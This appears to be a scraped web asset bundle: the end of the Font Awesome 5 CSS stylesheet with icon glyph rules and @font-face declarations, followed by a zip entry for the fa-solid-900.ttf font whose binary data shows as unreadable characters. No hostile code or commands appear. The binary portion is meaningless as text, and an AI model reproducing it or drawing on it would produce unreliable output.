.fa-wind:before {
  content: "\f72e"; }

.fa-window-close:before {
  content: "\f410"; }

.fa-window-maximize:before {
  content: "\f2d0"; }

.fa-window-minimize:before {
  content: "\f2d1"; }

.fa-window-restore:before {
  content: "\f2d2"; }

.fa-windows:before {
  content: "\f17a"; }

.fa-wine-bottle:before {
  content: "\f72f"; }

.fa-wine-glass:before {
  content: "\f4e3"; }

.fa-wine-glass-alt:before {
  content: "\f5ce"; }

.fa-wix:before {
  content: "\f5cf"; }

.fa-wizards-of-the-coast:before {
  content: "\f730"; }

.fa-wolf-pack-battalion:before {
  content: "\f514"; }

.fa-won-sign:before {
  content: "\f159"; }

.fa-wordpress:before {
  content: "\f19a"; }

.fa-wordpress-simple:before {
  content: "\f411"; }

.fa-wpbeginner:before {
  content: "\f297"; }

.fa-wpexplorer:before {
  content: "\f2de"; }

.fa-wpforms:before {
  content: "\f298"; }

.fa-wpressr:before {
  content: "\f3e4"; }

.fa-wrench:before {
  content: "\f0ad"; }

.fa-x-ray:before {
  content: "\f497"; }

.fa-xbox:before {
  content: "\f412"; }

.fa-xing:before {
  content: "\f168"; }

.fa-xing-square:before {
  content: "\f169"; }

.fa-y-combinator:before {
  content: "\f23b"; }

.fa-yahoo:before {
  content: "\f19e"; }

.fa-yandex:before {
  content: "\f413"; }

.fa-yandex-international:before {
  content: "\f414"; }

.fa-yarn:before {
  content: "\f7e3"; }

.fa-yelp:before {
  content: "\f1e9"; }

.fa-yen-sign:before {
  content: "\f157"; }

.fa-yin-yang:before {
  content: "\f6ad"; }

.fa-yoast:before {
  content: "\f2b1"; }

.fa-youtube:before {
  content: "\f167"; }

.fa-youtube-square:before {
  content: "\f431"; }

.fa-zhihu:before {
  content: "\f63f"; }

.sr-only {
  border: 0;
  clip: rect(0, 0, 0, 0);
  height: 1px;
  margin: -1px;
  overflow: hidden;
  padding: 0;
  position: absolute;
  width: 1px; }

.sr-only-focusable:active, .sr-only-focusable:focus {
  clip: auto;
  height: auto;
  margin: 0;
  overflow: visible;
  position: static;
  width: auto; }
@font-face {
  font-family: 'Font Awesome 5 Brands';
  font-style: normal;
  font-weight: normal;
  font-display: auto;
  src: url("../webfonts/fa-brands-400.eot");
  src: url("../webfonts/fa-brands-400.eot?#iefix") format("embedded-opentype"), url("../webfonts/fa-brands-400.woff2") format("woff2"), url("../webfonts/fa-brands-400.woff") format("woff"), url("../webfonts/fa-brands-400.ttf") format("truetype"), url("../webfonts/fa-brands-400.svg#fontawesome") format("svg"); }

.fab {
  font-family: 'Font Awesome 5 Brands'; }
@font-face {
  font-family: 'Font Awesome 5 Free';
  font-style: normal;
  font-weight: 400;
  font-display: auto;
  src: url("../webfonts/fa-regular-400.eot");
  src: url("../webfonts/fa-regular-400.eot?#iefix") format("embedded-opentype"), url("../webfonts/fa-regular-400.woff2") format("woff2"), url("../webfonts/fa-regular-400.woff") format("woff"), url("../webfonts/fa-regular-400.ttf") format("truetype"), url("../webfonts/fa-regular-400.svg#fontawesome") format("svg"); }

.far {
  font-family: 'Font Awesome 5 Free';
  font-weight: 400; }
@font-face {
  font-family: 'Font Awesome 5 Free';
  font-style: normal;
  font-weight: 900;
  font-display: auto;
  src: url("../webfonts/fa-solid-900.eot");
  src: url("../webfonts/fa-solid-900.eot?#iefix") format("embedded-opentype"), url("../webfonts/fa-solid-900.woff2") format("woff2"), url("../webfonts/fa-solid-900.woff") format("woff"), url("../webfonts/fa-solid-900.ttf") format("truetype"), url("../webfonts/fa-solid-900.svg#fontawesome") format("svg"); }

.fa,
.fas {
  font-family: 'Font Awesome 5 Free';
  font-weight: 900; }
PK!|�t�t�%fontawesome/webfonts/fa-solid-900.ttfnu&1i�
�PFFTM�qq�XGDEF*��8OS/2C��X`cmapA6M\
gasp���0glyf� �#*z�head���6hheaC$hmtx0u���loca.�h�maxp�8 nameI�2���%post�zƱ��-_IyX�y��_<�؈��؈��������������� @��LfGLf��PfEd���/���.�T�:� ������@�`����@@��@��@������@@�����������@�`?�@�����@���@?��������@���@�@��@��������?@��@��4�@������@�@@���������������������������?@��@
@
?
�@�@���`�������������@@@?@��@���@����@������@`��������?���������@����?@ ��@��@�������������������������������������������������������@������� ��@@��??������� � ��@� �  ���������@@���������@������������ ��@�@������������@����@��@���������@�������
��
��
@���@@��@��@�`@������@@���@����@���������@�?����@���@@@��?����������������������@@�������@�������������� ������������������?�������������������@@��������@���������������������@��h��������@�@��������@�����@@��?���@�@��@����������������������@ @���������@@�����������������������@������������������� ������������@�����@�����������@���@������ �@���@�����������@��������@�����@���������@��?@�������������������@��@����?��@��@�@���?���?���������@����������� ����������@������ �����������@����������@�@@�� ��� ��
	�vv���������>�D�N�[�^�n�|��������������������������������"�.�1�5�:�>�D�F�K�N�Y�^�e���������������������������������-�6�9�I�N�]�l�w�z�������������������������������������(�8�[�]�`�b��������������������������4�6�:�<�?�A�C�E�G�K�N�P�S�X�]�_�b�f�m�r�t�y���������������������������	�����������������������������������!�0�7�<�A�D�G�J�O�Q�U�X�^�b�f�k�m�o�t�v�y�|�����������������������������������������������"�)�/�=�@�C�G�M�S�V�[�_�i�k�s�}�����������������������������������������������������*�/�����������!�A�H�P�^�`�p���������������������������
���� �$�0�3�7�=�@�F�J�M�P�[�`�����������������������������
���!�3�8�@�M�Q�l�q�y����������������������������������	��(�7�X�]�`�b��������������������������3�6�9�<�?�A�C�E�G�K�N�P�S�X�\�_�a�f�h�p�t�w�}�������������������������������������������������������������!�.�7�;�A�D�G�J�O�Q�S�X�]�b�d�i�m�o�t�v�x�{������������������������������������������������"�(�.�;�@�C�G�M�S�V�Z�^�i�k�r�|�����������������������������������������������������)�/����������������������������������������������������|{zywjihd`]TSRQNEDCA?431,+%" 
�����������������������������jigfH&


�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
}
|
{
z
t
f
a
]
[
Z
Y
X
P
L
J
H
F
0
#
"
!
 
















������������������������������������xusrpfedcba^[YXUSLKI?>982/*&
���������������������������������������~zL�X�\���@�h		�
�|��
4
� �� �X��Dd���P�`�d$��H���|P�  d �!!�!�"P"�"�#8#p#�$$$l$�%%`%�&&|&�'l'�(�))x)�*<*�++�,T,�,�-�-�.�/0/�0 0�1h1�2�3�3�4�4�505�6|6�7$88�9P;�<\<�==�>�?,?�@@|@�A�BB�CpD(D�E�FHF�G0G�HH�IdJlJ�K$K�L�M�M�NHN�OpPP�P�QLRS�TlUU�VV�WPW�W�W�XXpX�X�Y$Y�ZHZ�[L\$\�]�^__�`L`�aHbTc8dd|e e�f f�g4g�hDh�h�i$ili�jTj�j�k�l l�l�mtm�nTn�ptqtq�r�ssXs�t�u�v8v�v�xyypz@z�{�| |�}l}�~,~�~���L����T��L������X��� �x����� ���d���|�������|�h�L�0�$�������|�0��������H����P����4�X�|�l��������������4�����\����D���������������D����� �����<����� �������`���p�8���0��p�������(�P�0�������L���@���|���X�Ȭɠʀ�`�8���l���H΄ϔ�@���d����0Ӡ��|���0��֜�p���,�@���l��t�ܸ�@ݰ�`�߈�P���8����P��P��T���p��8����t�P��������������l� ���X�������@�����H������L�T|D�x��	�
l
�H�@��
x
�L��P�����l�,�\��(�x��h�P���8� L �!p!�"�#H$%,%�&,&�&�'|(8)p**x+ +�+�,�-./00�1x22�304\4�5`66�7@7�8T9::�;�<X<�=@=�>�?0@d@�A�BB�C�DPD�ElF�GPHH�I�J�KlL,L�L�M�M�N�OdO�PDP�Q�RHR�T4T�UlVV�W8W�XhX�Y�Y�[�\L\�^^�^�_�`8`�aLa�b�c|d$d�ee�fDf�gglg�hLh�i�j@kTk�l,l�m\nnpn�o�p�q`q�r�s�tPt�upu�vlw8xx�yly�zh{{p||�}�~(~�(�\� ���������d�L���h�h������������������������0�����(���P�(�L�(���� ���l���p���H�l�������,�������D������(����������P��p����������� ����������4���T���8���@��¤�Ð�H���p����t���Ɍ�T���X�D��D��d���(ј�@��ӈ�h���D��֘��؜�$�8�(�����t߈������H�������h��|������ ����(��4��H�(�����<����������X4��		�
<
�pT
@H��P��x�`0�8(�`������$!",#T#�$p&�'(((�)�*T+L+�,0--�.D//�0l0�2 2�4P55�6�77�9<:;@<�>d?�@|A�BhCXD�E�FHGG�I4I�J�LL�MxNN�O�Q8R8R�TT�U�V�WX�X�YLY�ZL[�\4\�]@]�^l__�`�a�bXb�cLd4ee�f�g�h�j`k�k�l�mXnn|o|pphp�qpq�r�r�sxt$t�u�vv�wDw�x�y$y�z������32+"546;5'&63!2��8�8������**���"&46325"&463247%68P88(�8P88(@���%%6%�K�%%6%^���!%"/&=#"&46232&264&"�d8HVzz�z,
�jKKjKd
,z�zzVH8KjKKj�����"/&6767>�/+�

�+/)k&&k�(|+�

�+|(#	''	��1�62/&?'&6?	(	A�j �� j���&g�	DD
�g&����$"&4622#!"&=46;27jKKjK&7O��O7#L#�KjKKjkO7**7O	�/;GS_kw��2+54+"!54+"#"&546;;2=!;2=54+";2=4+";2=4+";254+";2=4+";254+";2=4+";2=4+";2�

(��(

(@(��((((((����p((((((�
��

P
��((l((l((�``�``�((l((l((���/?32+"&=46#2+"&=46346;2+"&5"&=46;2#(�

�
F

�


�

�
(

�

�
�

�

�

�
��

�


�

�
	��� 0BRbr��+"&=46;2+"&=46;2746;2+"&5#+"&=46;22+"&=46346;2+"&5%"&=46;2#"&=46;2#%46;2+"&5�
e

e
�f

f
 
e

e
 f

f
�

e


e

e
�

e

e

e

��
f

f
�P

P
�
P

�

P

	
P

�
P

P
�

P

�
P

P
�
P

P
h

P

���/?O_7+"&=46;246;2+"&52+"&=463"&=463!2#463!2#!"&5"&=463!2#�
e

e
�
e

e
}

e

�



��


��




�P

P
�

P

�
P

P
�@
P

P
�

P

�
P

P
7'&4?62762"��%p�%��	�$p�$����aq#7"/"/&4?'&4?62762�d		
	dd	
		dd		
	dd	
		�d	
		dd		
	dd	
		dd		
	���5=++"=#"=4;54;232"/&=#"&46232&4&"208 88 8�d8HVzz�z,
d�PpPPp 88 88��d
,z�zzVH8d�pPPpP���%-+"=4;2"/&=#"&46232&4&"20���d8HVzz�z,
d�PpPPp  ��d
,z�zzVH8d�pPPpP����)9#".54>7632654&'.?>+"&=46;2�08�gCrC. 	
bFEc$ _
 

 
�"k=g�BrD)L>	"'EcbG'G	�

�

��h�/?O72+"&=4632+"&=463%2+"&546372+"&546372+"&5463�		0		P		0		0		0		�		0		�		0		�	�		�	`	`		`	�	��		 	`	��		�	`	� 		�	����<D%/'&=&''&'&?&47'&767667547676264&"�	&+"	76
"*	&	**	&	*"	77	"*	&	*�B//B/�
5)1

1)5	$
5)1

1)5
##-/B//B����A�D62+"&=4.+"+"&=%#"/&"#"/&54?62546;2�	p	@		p	����"
Z8,��	
`	`
	�1���JI�����2"&4?6/54+"�Α�Α1
	@0��Α���	'
.����E�"0B%+'4&+"#"&76;;265'32;26/&+"2>5'4&+"3=�	D��bb�((7	.	-bb@4,,�00���+3;3232"/&6;546#!"&=46;2?324&"264&"2�P
X
	��	

X2
�0

�1*1�
|L�
�	��	�
��p

p
11j@�%#!"&=4?>3!23373'8� j
��U{ p {U����

+�@@����/2+"&=463.#"3276#"&54>32'463��eM-IggIC1	"	
G_g�BsC8b#��/$*g�g,"	@�gCrC.)R���'N46;2+"&=463.#"+".5>322676;2#"&'+"=46;2#'�/�eM->_
1�Z8b#�>_
1Eh<8b#/�fM��/$*L;	Ws.)��L;		9\5.)R�/$*���'3?K!"&5463!2"264"264"264754+";254+";254+";2�`���""""""������� `��h""I""I""�  T  T  ����%2#!"&=46;5462#54&"���Y~YP*<*���H?YY?HH**H���'276#"&#"+"&5&54662^0E;?$h>4

"!Gh] �	)#^

�!

#���12+"&=46;254&"6;2+"&/.=4�Ԗ
A-

/!q�q!/

-A
��j0-?
�
"OqqO"
�
?-0j���6/#"&=46;�Yf

fy��Y
�
����#6/#"&=46;.6764'.>�Yf

f�				x��Y
�
)0).��@�'>P6/#"&=46;%.67>54&'.>&'&67>4.'.>.6764'.>�Yf

fB<DD<	!/91	(-)			
)a				y��Y
�
�'~�~'=J';h!�`S	$,.,$6)0).	����#'+=3'3573#75#53'35%3#5##5333#'3#��@����@����@  ` @`@  @  ��@@@�@@@�����@@@� `� �   �#'+/37;?13333333333333333333333333333333			$										���������������������������������������������������=46;2"/&6"264���(��((���(���((����)%"/&=46;2264&""'764/32��(���((2�(��1��(����((���J��(����#/8%#!"&5463!2;2=4+";2=4+"&7!"3�		
��(88(H
���������

X4
8(@(8
nF�  ����
463!2' �@��0p���#'082+#!"&=#"&=4635463!25!%5#"&=#264&"�%	0
��
0	%

	.	@�0	�&%p	`

`	p%�
	.	
��``�`	0�H���"*#!"&546;7>;2324&"26"&462�`X

~X�FdFFd&4H44H0�� !	!�dFFdF�H44H4����+2%2+"&=46;'#32+"&=46;6;2'3'&'�		�		�		�		�H��c) 	 		 	QQ	 		 	u���|��x�",7%+"&=46;#"&=46;2'32654'&#>54&+321!&2'(�		!!		�2 $�M-"UQ�8',C	 	?	!	8$3�q$
��""���*� 72+"&?6;#".?6;2+�

�	
(>"
�	
)>  
 
@	 
 
����C�-G!2+"&=#32+"&=46;#+"&=46+32/&6;5#"&?6 		#	7"		�		"7	#		�P00PP00P�	`		0��	 		 	@0		`	P�PP�P������-G!2+"&=#32+"&=46;5#+"&=46&=#/&?63546�		#	w"		�		"w	#		�P�PP��	`		0�	 		 	�0		`	��P00PP00����/?#!"&=463!2463!2#!"&5"&=463!2#'2#!"&=463 	�			��	�		�`			�		�		�		�(		(		�		(		��	(		(	�	(		(	����/?+"&=46;2"&=463!2#"&=463!2#'2+"&=463`	�		�	��		�		�`		�		`		�		�(		(		�	(		(	�	(		(	�	(		(	����/?5463!2#!"&"&=463!2#"&=463!2#%"&=463!2#�			�	�		�		�`		�		�				l(		(		�	(		(	�	(		(	�	(		(	����/?5463!2#!"&"&=463!2#"&=463!2#%"&=463!2#	�		�`			�		�`		�		�`		�		l(		(		�	(		(	�	(		(	�	(		(	���/?O_5463!2#!"&"&=463!2#"&=463!2#"&=46;2#"&=46;2#"&=46;2#�	`		��			`		��		`		� 		@		@		@		@		@		L(		(		�	(		(	�	(		(	4	@		@	�	@		@	�	@		@	������/?J5463!2#!"&"&=46;2#"&=463!2#'"&=46;2#%&?6'	�		�`	�		�		�`		�		�		�		�U`l(		(		�	(		(	�	(		(	�	(		(	Y`�����/?J5463!2#!"&"&=463!2#"&=463!2#%"&=463!2#%&=46	�		�`	�				�`		�		�				��`l(		(		�	(		(	�	(		(	�	(		(	o`�@�2#!"&54636/5P���"#n��� &�K��")"&5463!2"264!5'&'&�`���.!!.!h�X�8H ��H!.!!.�pX�8H����.5462"�="
p�p
"=6#X$5"PppP"5$X#
����
6462"7264&#�Α��gLllLYΑ�Α@l�l��`�!"&54>762264&#"&54&"�6,!g�g!-5-		!/		B�4_6I&JhhJ&H8^4�@		/!		.B��@�7.?67/&?624?6#!"&5463!2+!�Z�\
��$Z$ �(��(�@mZ�
\� #Z#��(�`(��@����4;276/+"@0�%%�0���
��
�����54;27676//+"(�%�%%�%�(h��
��
��
��
�����7&4?6'7&4?6'�%%@�%%�

�
��
�

�
��
����%&546���13�6������#"&546;2%+"&546;2�`````��0`����2#!"&5463������`���%&546&546��%%@�%%�

�
@
�

�
@
���+"=&=&54654654;2(�%�%%�%�(t����
��
@
��
��@����+"=&54654;2�0�%%�0��X��
�
��������%#!"&=463!2%"&?62#�
��

�
�p�*�@@

@
39��9��%�?62"/&4#�����������%�%"/.?'&6?62�������������#2"&454+54+"#";;2=32�Α�Α�\8\\8\��Α�΃8\\8\\����2"&4!2=4#!"�Α�Αt����Α�Ώ88����#2"&4'76/&'&??6�Α�ΑrBB(	AA	(BB(	AA	(��Α�ΨAA	(BB(	AA	(BB(����"&46276/&'&��Α�΄��Fh'Α�Α����Fh����+3"&462"7>32;2=4>54&"264��Α��`J+	#	

8H &&'Α�ΑR@		



	&*<�&&����'2"&4$"26454+54+";#";2�Α�Α	""@X��Α��#""�d@���(PX%2++"=.'#"=4;>754;2>7#"=4;.'+"=32+54;24"&462�3N.(FeeF(Fe�,?
))
?,(,?
))
?,(�(.N3eF(FeeF�
?,(,?
))
?,(,?
)y����
2"&4.67�Α�Α�`�4&��`�4��&��Α��`&��4`&4������%"/&4?62!2#!��x

��x��s
 
s����762"/&6?!"&=463!'.���x��

x}��s
 
s����7'&4?62&/+"&5#��s
 
s���x��

x����%"/&4?646;27>���s
 
s���x

��x���&='.54>7546��1D2
#02LP4�

X*@+U,,B)	P
����!2C546;2++"%4;2+"=#"52+"=4;543+"&=4;232
|T( |
(T�
|T�|
(T|
(T�
|T�|
(T�
|T����!2C#"&=4;232%+"=4;54;2+"=#"=4;2+"=46;2+�|
(T��
|T((T|
�(
|T
|T(
(T�XT(
||
(����#%2++"&=#"&=46;546;2�

�
 
�

�
 
�
 
�

�
 
�

����%2#!"&=463�

��

�
 

 
����6%/+"&?&/&6?'.?>'&>;276�	�&�	��	�&�	�r	"	T��T	"	NN	"	T��T	"	N����"&462"264';2574&+"��Α��T&&Z0@'Α�Α��&&������
.9C353#"&53#2#!"&=46;&54632>32!3.#"3264&#" ��
�
 
	� 	
,
4$..$4
��V#!� ����
@
P		P
$4 $$ 4$5"$%����@�'&'.7>3264&#"&546;26762"�u8[5	 @Q}G		�upPP/O�BN��	.%,.
/>0"		TPp/)����!"&547632654.676�#11#q�q7%&
"�2,2M/OqqON9U&% "*=%
@�-%#".'&47>22654&"72"&54732654'6=*�[<oV*����<TTxTT<(88O9	�Pa-O5Paa�T<<TTxT�8O99'
	����3J%27#"&'&4767#"'&54?632>32'654&#"654'6320@

4)%[�*i'@_���57[�*
0IT<6I	

'80)
aPQ%=#:�c
aP<9<T98'����H�!%#!"&762"264';2574&+":
� 
�8&&Z0@00���&&�������@�*2++"&?#+"&?'&6;23'&>;2�BBri	B	1g+(	  	(+g1B	i'2'�
�:ll:������	!-9EQo!#!"&%;2=4+";2=4+"';2=4+";2=4+"';2=4+";2=4+"2!546;546;23546;2���@((((�((((�((((P�@0	 	�	 	���((�((t((�((t((�((@000		00		0���;%&=#"/73546%"=4;2'!#+"=4;76;546&5�P;F55 �coF55  �oT�;PPYP(K:9(g8K:9�8�(PP�����2#"'#"&'&>7&54�Ԗ�j83AL9�z�z319JV���?#"=46;2%+"&=46;232".54546;226=46��hW�h��Nt{tO�2<2 PPP|,	Ht;;tH04-44-4;�E/&/&4?62�����=����;�E7'&4?>76"�����C������}�!C%"/&4?625#"/&6;2762+"&="/&4?62"/32vee(�	�
(���
(ee(�	hdd+�
�+
�+dd+���B�.%#!!2"&547#"&547#"&=46;2!2��
 !.!�!.!FF

g
	�� #!!!! W

-�2#!"&546;��`�@@� @D� %#!"&?>3!2%"46;32=I!�pI!��T 	E�@��|
|
8v@0�/?T%"&=46;2#3"&=46;2#!"&=46;2#3"&=46;2#2#!"&546;2M&:&��&:&�		�0
	 	�����FF��@	 	
P		�����-5=M!2#!"&546";2=4#2=4&+"#"3264&"62"&4265463264&#"0��`	t@	���dFFdFTH44H4!	
		&���` 	
`J	-$��FdFFd�4H44H4	
		&���"*#"'+++"&=4?&54>32264&"gI%
(
p
�	/Q0Ig�((Ig(
(

N
�0Q/g((������;C����'&'&?&'#"'&76;67'&767667632+/'>'&/'.=&''&'&?&7'&76766754676276>.6'&'&?&'#"'&76;67'&767667632+/'>'&







&	
&	g"	!
&&	
 
!!
 	&&
 
"{#0#0	







&	
&			
			
	

	>##�
(
""
'
 
'

"	
"&
50#0#�		

				

		>##����B�+#"'#"&'&767&5462#"'#"&'32654'�zV<3+.&z��.+3<@hc�9HB�^")3B^��"
6,qO	Q13�� �
&?'&6?6 � j�A	��HD	�g&�����,%+"/&=#"&546?#"&=463!2+*&
�
�
0&*



*� -
h00h
$<v
0

0
��@�19A232#!"=46;5.'&'&=46;5463!2&'#%5#676(
>0>%0%��%0$>0>
h

��@�@#�
88-"4HH
&"-88
(

(�
)--)
���/7?%#"&=#"&?62+7#!"&=46;;26=324&"264&"2(P
X
	��	

X�
�0

�!P!�
|L@
�	��	�
p

p
!!j�����#7&.7>&>676>.2327>�"		
'BF:;-+
+"		
'BF:;-+
�4j
^�"+
+-;:FB'
		"+
+-;:FB'
	c
j4,^�����#"/&?6>7'&?6���p1;[<0����h0<\:2p����.2#!"&54632654/"#"'&#"���.x�A
%#KF	���`���x	FK#%
A����&%2#!"&=46;5462+"&=4&#"���Y}Z
 
+*���f@ZY?

*+g��@�	!+=!#!"&7;2=4+";2=4+"!5463!2@� ����HH�����X((((00����16"&462+"&5.'"&=463+"&5.'"&=463�%5&&5�	0	wT	
t��	0	ː	
V�sF;5&&5%o
	Tw	0	�t
	��	0	Gr�@�&.%#!"&=463!2'!"7>3!2&"264&"264@� �0� a
a3s�``<�

�`��@�,4$#"/&++"'&547#"&=46;2?632#2@ 	UBUK"%%�UBU	@!TkkT�J�
D5+"#5:%`%5D
��C`C�����;%//&/&?'.?'&6?'&67>7676�.

?>	--	>?

..

?>	--
>?

�-
>?
..
?>
--
>?
//

?>
�'7?%+#*#"&'.=47>763232+"&=46;24&"2d

##GE
	��`
0

0
�
+% $
	�

-+
�

�
��&6>3&'&632#*#"&7.7.7#"&54632+"&=46264&"-�	
EG#('

d�0

0
$
+-

�	
$$#%+

�

�
�������'7?2666+"'.'&54654632+"&=46"264�
+%#$$
�

-+
�

�
��d

'(#G
E
	��`
0

0
������&6>5&547>76;2'''#"&546;2+"&64&"2\
+-

�	
$$#%+

�

�
��	
EG#('

d�0

0
����%"&462'326=4&+764/&"2?64gΑ�Α�L�

�L��8�Α��H

H������%2"&47#";2?64/&"�Α�Α�L�

�L����Α��H

H������%6462"'7;26=2?64/&"2�Α��H

H��YΑ�Α�L�

�L������%"&46254&+"'&"2?64/&"��Α��H

H��'Α�Α�L�

�L��	����
"+17=#>2473#%#&'%#>#64'#&4733"&673%3.P�0:0���Bl#5S��$lSk		r�r		r(�0:0�$lS��l#5S DTT�@  @ �\2K[2\3K�    !>!@"!>!!DTTJ2\3K~\2K�����$'"&4?&67>76264&"�	P&�5%�
J$JDK
�<S$I
�%5�%Q	
KDJ�������/7HY"&=463!2#"&=463!2#"&=463!2#$2"&4/&?676/&?676�		 		��		 		��		 		�<((�H		/			@		H		/			@	<	(		(	�	(		(	�	(		(	T((GH		0			?			�H		/	?		�����2/&='&63��P
�����
8��'+%53#!"&=3;2672!546;546;2#5#@��`�	`	��P�@�p0��0		�PP00  �����;%"/&6;5#/&4?635#"&?62+3546&=#32`OO3eOOe3
OO3eOOe3
OOe3OO
3eOOe3OO
3e����&:H6"&462"&4622+.'63*&4622#!"&=46;27'#"&=46;2z4&&4&�4&&4& &
B �\BB\B#0C��C0	!F!�(B
&@�&4&&4&&4&&4F& 
*!B\BB\bC00C
:#
 &�����%K"&4?62?64'&'&5&?66&'&'&?>'&"&'&4?6G,,D,~Y,&	
<C	jY,&	
<C	
,,D,-~,D,Y~,&
	;C<
�Y~,&
	;C<
	-~,D,����%#!"&5467454632632.K5��<T6*^B,J(8�$65KT</JB^,$8(����%%#!"&?5#"&=46;2+3'&=#�(*��*(u

�

��0@,#II#��



�iN
��
����'/7%"/"&46327'#"&462762264&"264&"�		Ft8P88(!!(88P8tF		����	s(88P8!!8P88(s	F������#,!#!"&546;3;#!"&546;#532@
��

H!�
h
��

�y`
(

p
��!X
��

p
I
`������2&6?62&'&6?6?64'&"2?6"++,�"^!!!�@��		�(�3H��-~--�"""_!�?��		�*�K5��-����(#!"&5463!2264&"4/&+";25����6%%6%���>��`��%6%%6h����2#!"&5463������`����/"&=463!2#"&=463!2#"&=463!2#		�		�`		�		�`		�		<	(		(	�	(		(	�	(		(	���'7G"&4622"&42"&4"&=463!2#"&=463!2#"&=463!2#`(((((((�		`		��		`		��		`		t((�((�((	(		(	�	(		(	�	(		(	�����=hx��4;57#/&?6;232+"54>54#"/&763232+"5763254+"/&?5+"=4;2#"'&"&=463!2#"&=463!2#"&=463!2#	C		'D

:�		`		��		`		��		`		4(
	T�
	�
		
		L	(		(	�	(		(	�	(		(	���.L%!"&=463!23#"&=46;232654'#&54632+"&=4&#"� 		�		�{
$*>\	-0#)N�
TC)%	.
"%�	 		 	&60	"v!=@		
����2B7"&=#"&=46;2+32>=#"&=46;2+!2#!"&=46�GU

�

L"		�

(F��		�`		<NI�	 		 	�O$�	 		 	�0F!<	 		 	���2#!"&54635#75#5#75#��`�����������`��``�``�``�``���'+/?/?/?"/&47627'�    �5555E5555b		��	
U		l	
;W3V`   `555�555�
	��		U
	l		�V3W����'/7<%2+"&5#"&5#"&5463!232264&"264&"75'#p		08P8�8P8@,d�,((\((�d,`	 	(88((88(@0dlp((((�dp��!&+2#!"&546334&#5265#264&"5"75#`

��

@%%@�B//B/`%@@%�
��

@
��%�%�8P88Ph@%�@%W9!2"/&6
	��	
	��	`9	%!"&?62!��
	��	
`	��	'�Y/&4?6�	��	A��
	��	
'�Y546&	��	?
	��	
���2#!"&5463#!#��`�������`����
��3�732"/&6%+"&?62)�ww�w�wwiw
��3�732"/&6)�ww�ww
�4�%#"&?62�ww�ww�:6#!"&=4632>76".#&'&=463!2"��`!y
	v�z4	�	1}��X	
	Ue	Y(&[	����+7#"&=4;2>3#"'&?63264&#"32��0#a6g��g_G
	"	2BIggI+Jb��N'+�͑@		",g�g'!0���7%"/&4?'"/&4?627'"/&4?62762�|(Q		s		.		s		Q(}q�}(Q		s		.		s		Q(|q����D�2#"&?#".?>;2(�.w 
�* ����
�����5EU72+"&=4637#546;5#"&=46;2+32#5##52+"&=463!2+"&=463�

`

H0�(

�

(�0�0H

`

P

`

`
`

`
P0:@
`

`
@:000P
`

`

`

`
����B�-C%'."'0.#""'.&7>75462632#"&'&>3265@57	(74�\\���/!*	�

#+
'"+$
cz



zx�!/
		����/8#"&546;6232#"6"2643+"&546;7#532�h

QJQ
�!*�h
�

�r`
B�
P
  
H!y��

0
h
&`B��`�
 053+"/&46320#41&'&7264&#"26546`�
>	`dKJg,%�%,�		.B		/&&
 GigIB2+00+2�		B.		!/����U$"&462462"7#!"&=4672654&'527267?6/546?6=4&'jKKjK��6J��@0!.!:$00 
$�KjKKj��N5--1KQ!!R

.,, 
*,���BJ2#"&'.=46?6326='.?>326=&7>264&"� gIGg7I?
	9('8
?I73.B!$			P%qEc_DY9�	
	
{(8:'z



	�9X.=+q&%P			���	
!46;235+32#"&546;�����00�`00 ��p�  P�`��������+"&537#!".54767>54675462�4&��	��		H8%:!@%q

	
C,:V

,B&,C������'7"&=463!2+##3264&!"'&763!2�(8
�5KK5 8(�  &&�!	
H@8(�
KjK(8 �&4&�� 	����'3;GSo!54;46;546;23232#";2=432=4+"#"3547#";2=44+";25'3;2=32=4+54+"#"��@
X
p
X
�((�((t(@4((�((
,h
H

H
�� ((@((�TT`(((�����'/KSX%2+"&5#"&5#"&5463!232264&"754+54+"#";;2=32264&"75'#p		08P8�8P8@,d�,((�808808�((�d,`	 	(88((88(@0dlp((�088088�((�dp���
%I3546;2335+32#"&546;4&+54&+"#";;26=3265` � ��@ 	0	 	0		0	 	0	 `00���  P�`���	0		0	 	0		0	����/%#32+535##'53535'575#5#57335#532+3 ``�0u(s0C"0@@0"C0s(u0���PE*EP������".:2#!"&5463!254&+7626=4&"26=4&"p!/Q
��


@	07	�			W			`/!�'
$*

�

(с	�E	�		�		�		�����3#!"&5463!2#"#54&+";26=3;26=4&���`p 	�	 		 	�	 		p��`D	PP		�		PP		�	����+2#!"&546354+54+"#";;2=32���@\8\\8\���`�8\\8\\�a*?62"/&4&4?62"'�``���``ш``
��``�a+7"/&4?'&4?627"/&4?'&4?>2�``���``			��``��``����A�+7"/"/&4?62'62"/"&/&47��``��``			��``���``����A�)7'&4?62762""/&4?62762��``��``��``���``�a?62"/&4 �``�ш``
��a7"/&4?'&4?62�``���``���XA("/"/&4?62��``� �``���X@(7'&4?62762"��``�`�``���@�#2+32#!"&46;7#"&5463!�H

��

H��@���00@�� ������!%%2#!"&=46;;267!463!2!p	&�&	�
=��@�� 	&&	p��P�������2#!"&5463264&"������`�� ��@�2+"&5463264&"�c��`�� ���9%2+"&=46;2+"#2+"&=46;2+"��^B

&��^B

&���B^
0
&@��B^
0
&@���92+"&=46;26=#"&=463#2+"&=46;26=#"&=463�^B

&P�^B

&P��B^
0
&@��B^
0
&@����'/7"&4622"&462"&4 "&4622"&4$2"&42"&40(((((�((��((((B((��((�((�`((�((((�((((B((����2"&4�Α�Α��Α������)2"&4"264&"26464."'.2�Α�ΑU��	
#n#
	-���Α���**6����%2"&4"264&"264>'&"762�Α�ΑU��-�-#n��Α���66*����2"&4"26424+"36264&"�Α�Α������Α���  � �`+3;2#"'##"&46354+54+"#";;2=32264&"6264&"�B^^BC/\/CB^^B`4(44(4�((l((`^�^00^�^�(44(448((4((
@�'3?KWco{���)"&5463!254+";2754+";2754+";2754+";2754+";254+";2754+";2754+";2754+";254+";2%54+";2754+";2� ��\((`((`((`((`((��((`((`((`((��(( ��`(( ��((((((((((T((((((((T((((((���.4X.'76#"&#"+"&5&546623256%5'5&'&56765767556�	2	2�;?$i>4

"!Gh0�"(#M'##&>&#7.(!?&#%% *D��	)"^

�!
#�HF
�GH	DDGFFDDHFG������$%"/&4?'&4?62#!"&=463!2����w
��

0
������

 

������+'&76'/&?6/&?'&?6=�=�}	�

�	+		[[			+		[[		+	�

@��*t	�		�	.	PP	/	.	PP	.	�		����@�076&76&'/&4&4?61'��3N>!0#9T�x�mm�

S)F/,UZR
T
��

^^
����	�6.=#"&67�/� �
�/�`�%-���7%2++"&53#"&5#"&=46;546;27#5376�

(
0
�s�
(

(
0
�s�;;`
0
(

�`

0
(

